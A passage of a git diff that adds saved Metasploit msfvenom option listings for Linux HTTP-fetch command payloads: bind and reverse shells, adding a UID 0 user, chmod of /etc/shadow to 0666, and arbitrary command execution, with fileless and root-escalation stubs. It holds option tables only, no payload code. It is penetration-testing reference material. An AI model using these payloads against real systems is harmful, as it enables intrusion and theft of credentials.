UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false 
no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..3073463 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/http/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nejxgfqQY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..dde3e35 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xeIcJbCNd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..61adaa0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt 
@@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/http/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME whMJpeucr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt new file mode 100644 index 0000000..2df29c4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt 
@@ -0,0 +1,73 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 63540 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eRpNwkkNw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..aa3a1ae --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt 
@@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SCwomktA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..ae08899 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt 
@@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QpMFAeUjmWP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt new file mode 100644 index 0000000..f49573f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Add User + Module: payload/cmd/linux/http/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cCeYYCJWit no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that 
executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt new file mode 100644 index 0000000..8436f49 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt 
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Chmod + Module: payload/cmd/linux/http/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DNiVRqeMDll no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend 
a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-exec.txt b/msfvenom/payload_options/cmd-linux-http-x86-exec.txt new file mode 100644 index 0000000..17db773 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-exec.txt 
@@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YvtCWJjZP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + 